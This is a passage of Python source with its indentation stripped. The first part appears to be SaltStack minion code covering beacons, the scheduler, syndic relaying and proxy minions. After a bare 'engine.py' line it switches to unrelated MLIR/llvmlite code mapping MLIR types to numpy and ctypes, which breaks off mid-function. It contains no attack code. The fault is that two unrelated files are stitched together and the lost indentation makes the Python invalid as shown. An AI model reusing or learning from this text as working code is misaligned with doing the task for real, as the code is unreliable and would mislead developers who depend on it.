'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # In minutes, not seconds!
log.debug(
'Enabling the grains refresher. Will run every %d minute(s).',
self.opts['grains_refresh_every']
)
self._refresh_grains_watcher(abs(self.opts['grains_refresh_every']))
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh '
'routine during minion tune-in: %s', exc
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
                    log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
            # In the filtering enabled case, we'd like to know when the minion sees something it shouldn't
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
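        # Illustrative sketch (example values assumed): a load such as
        #   {'tgt': 'os:Ubuntu', 'tgt_type': 'grain', 'jid': '2019...',
        #    'fun': 'test.ping', 'arg': []}
        # is routed through self.matchers['grain_match.match'] with the
        # configured delimiter.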
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
if self._running is False:
return
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
        # force auth_safemode True because the Syndic does not support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to false in Sodium release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
        # We borrowed the local client's poller, so give it back before
        # it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
    Make a MultiMaster syndic minion. This minion relays jobs and returns from
    all minions connected to it to the list of masters it is connected to.
    Modes (controlled by `syndic_mode`):
        sync: synchronize all events and publishes from higher level masters
        cluster: only sync job publishes and returns
    Note: jobs will be returned best-effort to the requesting master. This also means
    (since we are using zmq) that if a job was fired and the master disconnects
    between the publish and return, the return will end up in a zmq buffer
    in this Syndic headed to that original master.
    In addition, since these classes use a mix of blocking and non-blocking
    calls (with varying timeouts along the way), this daemon does not handle
    failure well; it will (under most circumstances) stall for ~15s trying to
    forward events to the down master.
'''
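    # Illustrative config sketch (option names taken from this class, values assumed):
    #   syndic_mode: sync        # forward events as well as job publishes/returns
    #   syndic_failover: random  # pick the next upstream master at random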
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
        # List of delayed job_rets which could not be sent for some reason and will be
        # re-sent to any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
        # if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
        Wrapper to call a given func on a syndic, making a best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
        Wrapper to call '_return_pub_multi' on a syndic, making a best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
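        # Illustrative sketch (master names assumed): with self._syndics keyed by
        # ['m1', 'm2', 'm3'] and master_id='m2', this yields 'm2' first and then
        # the remaining masters (shuffled when syndic_failover is 'random').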
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if not masters:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
            # if we are the top level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _metaproxy_call(opts, fn_name):
metaproxy = salt.loader.metaproxy(opts)
try:
metaproxy_name = opts['metaproxy']
except KeyError:
metaproxy_name = 'proxy'
log.trace(
'No metaproxy key found in opts for id %s. '
'Defaulting to standard proxy minion.',
opts['id']
)
metaproxy_fn = metaproxy_name + '.' + fn_name
return metaproxy[metaproxy_fn]
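# Illustrative sketch (opts values assumed): _metaproxy_call({'metaproxy': 'proxy',
# 'id': 'p01', ...}, 'handle_payload') looks up metaproxy['proxy.handle_payload']
# in the loader and returns that callable.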
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
mp_call = _metaproxy_call(self.opts, 'post_master_init')
return mp_call(self, master)
def _target_load(self, load):
'''
Verify that the publication is valid and applies to this minion
'''
mp_call = _metaproxy_call(self.opts, 'target_load')
return mp_call(self, load)
def _handle_payload(self, payload):
mp_call = _metaproxy_call(self.opts, 'handle_payload')
return mp_call(self, payload)
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload')
return mp_call(self, data)
@classmethod
def _target(cls, minion_instance, opts, data, connected):
mp_call = _metaproxy_call(opts, 'target')
return mp_call(cls, minion_instance, opts, data, connected)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_return')
return mp_call(cls, minion_instance, opts, data)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_multi_return')
return mp_call(cls, minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
        # Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
engine.py
import os
import sys
import shutil
import re
import subprocess
import itertools
import mlir
import ctypes
import glob
import operator
import tempfile
import uuid
import distutils.ccompiler
import multiprocessing as mp
import llvmlite.binding as llvm
import numpy as np
from .sparse_utils import MLIRSparseTensor
from functools import reduce, partial
from .cli import MlirOptCli, MlirOptError, DebugResult
from typing import (
Tuple,
List,
Iterable,
Set,
Dict,
Callable,
Union,
Any,
Optional,
)
# TODO we need O(1) access to the types of each dialect; make this part of PyMLIR
_DIALECT_TYPES = {
dialect.name: {
dialect_type.__name__: dialect_type for dialect_type in dialect.types
}
for dialect in mlir.dialects.STANDARD_DIALECTS
}
_CURRENT_MODULE_DIR = os.path.dirname(__file__)
_SPARSE_UTILS_SO_FILE_PATTERN = os.path.join(_CURRENT_MODULE_DIR, "SparseUtils*.so")
_SPARSE_UTILS_SO_FILES = glob.glob(_SPARSE_UTILS_SO_FILE_PATTERN)
if len(_SPARSE_UTILS_SO_FILES) == 0:
# TODO this hard-codes the setup.py option and the location of setup.py
raise RuntimeError(
f"{_SPARSE_UTILS_SO_FILE_PATTERN} not found. This can typically be solved "
f'by running "python setup.py build_ext" from {os.path.dirname(_CURRENT_MODULE_DIR)}.'
)
elif len(_SPARSE_UTILS_SO_FILES) > 1:
raise RuntimeError(
f"Multiple files matching {_SPARSE_UTILS_SO_FILE_PATTERN} found."
)
[_SPARSE_UTILS_SO] = _SPARSE_UTILS_SO_FILES
llvm.load_library_permanently(
_SPARSE_UTILS_SO
) # TODO will this cause name collisions with other uses of llvmlite by third-party libraries?
llvm.initialize()
llvm.initialize_native_target()
llvm.initialize_native_asmprinter()
MLIR_FLOAT_ENUM_TO_NP_TYPE = {
mlir.astnodes.FloatTypeEnum.f16: np.float16,
mlir.astnodes.FloatTypeEnum.f32: np.float32,
mlir.astnodes.FloatTypeEnum.f64: np.float64,
# TODO handle mlir.astnodes.FloatTypeEnum.bf16
}
INTEGER_WIDTH_TO_NP_TYPE = {  # TODO is there some nice accessor to get np.int* types from integers?
1: np.bool_,
8: np.int8,
16: np.int16,
32: np.int32,
64: np.int64,
# TODO do we need np.longlong here?
}
NP_TYPE_TO_CTYPES_TYPE = {
np.dtype(ctype).type: ctype
for ctype in [ # from numpy.ctypeslib._get_scalar_type_map
ctypes.c_byte,
ctypes.c_short,
ctypes.c_int,
ctypes.c_long,
ctypes.c_longlong,
ctypes.c_ubyte,
ctypes.c_ushort,
ctypes.c_uint,
ctypes.c_ulong,
ctypes.c_ulonglong,
ctypes.c_float,
ctypes.c_double,
ctypes.c_bool,
]
}
def convert_mlir_atomic_type(
mlir_type: mlir.astnodes.Type, return_pointer_type: bool = False
) -> Tuple[type, type]:
"""
First return value is a subclass of np.generic .
Second return value is a subclass of _ctypes._CData .
"""
# TODO Add a custom hash/eq method for mlir.astnodes.Node so that we can put
# all the mlir.astnodes.*Type instances into a dict
# it'll obviate the need for this section of code.
np_type = None
if isinstance(mlir_type, mlir.astnodes.FloatType):
np_type = MLIR_FLOAT_ENUM_TO_NP_TYPE[mlir_type.type]
elif isinstance(mlir_type, mlir.astnodes.IntegerType):
np_type = INTEGER_WIDTH_TO_NP_TYPE[int(mlir_type.width)]
elif isinstance(mlir_type, mlir.astnodes.IndexType):
np_type = np.uint64
if np_type is None:
raise ValueError(f"Could not determine numpy type corresonding to {mlir_type}")
ctypes_type = (
np.ctypeslib.ndpointer(np_type)
if return_pointer_type
else NP_TYPE_TO_CTYPES_TYPE[np_type]
)
return np_type, ctypes_type
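# Illustrative sketch (example mapping only, drawn from the tables above): an f64
# FloatType node maps to (np.float64, ctypes.c_double), or to
# (np.float64, np.ctypeslib.ndpointer(np.float64)) when return_pointer_type=True.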
############################
# MLIR Return Type Helpers #
############################
def return_pretty_dialect_type_to_ctypes(
pretty_type: mlir.astnodes.PrettyDialectType,
) -> Tuple[type, Callable]:
# Pretty dialect types must be special-cased since they're arbitrarily structured.
raise NotImplementedError(f"Converting {pretty_type} to ctypes not yet supported.")
def return_tensor_to_ctypes(
tensor_type: mlir.astnodes.RankedTensorType,
) -> Tuple[type, Callable]:
if tensor_type.encoding is not None:
# We assume anything with an encoding must be a sparse tensor
# After lowering, this will become !llvm.ptr<i8>
CtypesType = ctypes.POINTER(ctypes.c_int8)
if isinstance(tensor_type.encoding, mlir.astnodes.SparseTensorEncoding):
pointer_type = f"uint{tensor_type.encoding.pointer_bit_width}"
index_type = f"uint{tensor_type.encoding.index_bit_width}"
else:
pointer_type = "uint64"
index_type = "uint64"
value_type = {
"i32": "int32",
"i64": "int64",
"f32": "float32",
"f64": "float64",
}[tensor_type.element_type.type.name]
def decoder(arg, ptype=pointer_type, itype=index_type, vtype=value_type) -> int:
ptr = ctypes.cast(arg, ctypes.c_void_p).value
return MLIRSparseTensor.from_raw_pointer(ptr, ptype, itype, vtype)
else:
np_type, ctypes_type = convert_mlir_atomic_type(tensor_type.element_type)
fields = [
("alloc", ctypes.POINTER(ctypes_type)),
("base", ctypes.POINTER(ctypes_type)),
("offset", ctypes.c_int64),
]
rank = len(tensor_type.dimensions)
for prefix in ("size", "stride"):
for i in range(rank):
field = (f"{prefix}{i}", ctypes.c_int64)
fields.append(field)
class CtypesType(ctypes.Structure):
_fields_ = fields
def decoder(result: CtypesType) -> np.ndarray:
if not isinstance(result, CtypesType):
raise TypeError(
f"Return value {result} expected to have type {CtypesType}."
)
dimensions = [
getattr(result, f"size{dim_index}") for dim_index in range(rank)
]
element_count = reduce(operator.mul, dimensions)
decoded_result = np.frombuffer(
(ctypes_type * element_count).from_address(
ctypes.addressof(result.base.contents)
),
dtype=np_type,
).reshape(dimensions)
return decoded_result
return CtypesType, decoder
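# Illustrative sketch (shape assumed): for a dense tensor<2x3xf64> return type the
# generated CtypesType struct has fields (alloc, base, offset, size0, size1,
# stride0, stride1), mirroring a memref descriptor, and decoder() rebuilds a
# (2, 3) float64 ndarray from the base pointer and the size fields.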
def return_llvm_pointer_to_ctypes(
mlir_type: _DIALECT_TYPES["llvm"]["LLVMPtr"],
) -> Tuple[type, Callable]:
raise NotImplementedError(f"Converting {mlir_type} to ctypes not yet supported.")
def return_llvm_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[type, Callable]:
if isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMPtr"]):
